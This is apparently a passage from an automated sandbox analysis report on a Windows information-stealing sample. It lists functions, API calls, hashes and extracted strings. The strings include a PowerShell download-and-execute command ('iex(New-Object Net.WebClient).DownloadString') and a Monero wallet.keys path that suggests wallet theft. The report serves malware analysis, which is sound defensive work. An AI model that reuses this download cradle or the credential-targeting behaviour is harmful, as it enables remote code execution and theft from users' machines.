                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 6ff91c324b68020fbcc8230351c50ce9e8198a4d0c4ac3470f06ba216abb055b
                                • Instruction ID: 24d1e7c0bf4614fac62893615a8166f8a75fdf57b89dc96d87fe0197a2e9524a
                                • Opcode Fuzzy Hash: 6ff91c324b68020fbcc8230351c50ce9e8198a4d0c4ac3470f06ba216abb055b
                                • Instruction Fuzzy Hash: 2D41B171C102099ADB14EFA0C8A6BEDBF78BF54301F50421AF916A7191EF746A4ECF91
                                Function 00549E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00549F41
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 9a7704d6f1c6853d34761295d25d09e124c74fb16a4237c2e477578570f0d83c
                                • Instruction ID: 9c26242fe5827c8c9dd4d28eaf7054f9e465e406a79e4792b29a1bd91041cc39
                                • Opcode Fuzzy Hash: 9a7704d6f1c6853d34761295d25d09e124c74fb16a4237c2e477578570f0d83c
                                • Instruction Fuzzy Hash: 33613270910249ABDB14EFA4CCAAFEE7B75BF84304F008518F9095B195EB746A49CB52
                                Function 005540B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,0107E998,00000000,00020119,?), ref: 005540F4
                                • RegQueryValueExA.ADVAPI32(?,0107ED48,00000000,00000000,00000000,000000FF), ref: 00554118
                                • RegCloseKey.ADVAPI32(?), ref: 00554122
                                • lstrcat.KERNEL32(?,00000000), ref: 00554147
                                • lstrcat.KERNEL32(?,0107ED78), ref: 0055415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 590c240c1f3a23c0cde07b4701cb8cf0c253bc969a2b188c03c21645385ecbb3
                                • Instruction ID: 788d5956d0849b38476e53e25d0df026bbd32bc410b35bf00aa33cbf5d60ca0a
                                • Opcode Fuzzy Hash: 590c240c1f3a23c0cde07b4701cb8cf0c253bc969a2b188c03c21645385ecbb3
                                • Instruction Fuzzy Hash: FD41BAB6D401087BDB14EBA0DC5AFFD777DB788300F008559B61A56181EA755B8C8B92
                                Function 00557E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00557E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,0106CEB8,00000000,00020119,?), ref: 00557E5E
                                • RegQueryValueExA.ADVAPI32(?,0107E898,00000000,00000000,000000FF,000000FF), ref: 00557E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00557E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                                • Instruction ID: 56efb76b2cf95b8240b611862324fabffb5c27db4d9d664421e8e5140a368cad
                                • Opcode Fuzzy Hash: ea9875ee0aac64b87c809c110d8b61b7b89ac13a2c635eeb5e030f3313882078
                                • Instruction Fuzzy Hash: 481130B1A44209BBE710CF94DD5AF6BBBBCFB08711F20815AFA05A7280D77858048BA1
                                Function 00559260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(0107ECB8,?,?,?,0055140C,?,0107ECB8,00000000), ref: 0055926C
                                • lstrcpyn.KERNEL32(0078AB88,0107ECB8,0107ECB8,?,0055140C,?,0107ECB8), ref: 00559290
                                • lstrlen.KERNEL32(?,?,0055140C,?,0107ECB8), ref: 005592A7
                                • wsprintfA.USER32 ref: 005592C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                                • Instruction ID: 500163c78d6353240f4ecee5eca953ff5661c5dbbb00720c7d4a87e4dac5f2b1
                                • Opcode Fuzzy Hash: 9f7940edcf45aaec21ec8089b50fafa8c05c5bccacee08966612f887eaaea519
                                • Instruction Fuzzy Hash: D0011EB5540208FFDB04DFECC994EAE7BB9FB44351F108559F9098B204C639EA40DB95
                                Function 005412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005412B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 005412BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005412D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005412F5
                                • RegCloseKey.ADVAPI32(?), ref: 005412FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                                • Instruction ID: 64496cd3bf276e75d5650731245ab0fb3b43d498094a3344207a8784ed2141fb
                                • Opcode Fuzzy Hash: 0ec7eea1b13991060d52ec5011131c44e89d319206e36b727f7f310a1b5b2fe7
                                • Instruction Fuzzy Hash: 4D0136B9A40208BBEB00DFE0DC49FAEB7B8EB48701F108155FA05D7280D6749A019F55
                                Function 0055C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: dce241c2444ab74c36de2ba790378d99cb72428d51dad4c17a0bbb63e05bed2d
                                • Instruction ID: eeb5810903a09548ea0a6e730aec0ccc755ace699d178ec18bc850c664f922f6
                                • Opcode Fuzzy Hash: dce241c2444ab74c36de2ba790378d99cb72428d51dad4c17a0bbb63e05bed2d
                                • Instruction Fuzzy Hash: 2141D5B150079C5EDB218B24CCA4BFB7FF8AB45705F1448A9ED8A86182D271AA49DF60
                                Function 00556630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00556663
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00556726
                                • ExitProcess.KERNEL32 ref: 00556755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                                • Instruction ID: 76d0334e3cb9ae8ef9df826022545192d81595670c63ba0d09d7774564a70188
                                • Opcode Fuzzy Hash: bd9e8f6393f17b99cd10519670dff27aa2f3dec5de4685aae1da7e9307b98591
                                • Instruction Fuzzy Hash: 82312FB1801219ABDB14EB50DCA5FDD7B78BF84301F40418AF61976191DF746B48CF6A
                                Function 005587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00560E28,00000000,?), ref: 0055882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00558836
                                • wsprintfA.USER32 ref: 00558850
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                                • Instruction ID: f27ffd1b6372606241725577f9286628833b3f6ade8cf7fff71a170a96260dd7
                                • Opcode Fuzzy Hash: 0e252984dd6d77bbbfbb8d926a5186856423be9433bbf97c6958831450a9ffc9
                                • Instruction Fuzzy Hash: 632103B1A40204BFEB04DFD4DD49FAEBBB8FB48711F20851AF605A7290D77D99018BA5
                                Function 00558D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0055951E,00000000), ref: 00558D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00558D62
                                • wsprintfW.USER32 ref: 00558D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                                • Instruction ID: 8931413a5d93e79e9bf228168f7fb1994a05517786c729212b24a77a023167f5
                                • Opcode Fuzzy Hash: b6e4b7bf5d711e34fed9c634af68a8ee0d2c3c33e38d54bcf60a15649016f6b9
                                • Instruction Fuzzy Hash: FCE0E675A80208BBD710DB94DD09E5977B8EB44711F104155FE0997280D9755E109B66
                                Function 0054A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                  • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0107B548,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 0054A3FF
                                • lstrlen.KERNEL32(00000000), ref: 0054A6BC
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 0054A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
                                • Instruction ID: f727ed7e75c65934af3fc6f130f2f1465cfa966cd4508246718fd0363928680b
                                • Opcode Fuzzy Hash: 07435dfd65fa43a7814629fed067686beb75d2da823935a033708263daffa14a
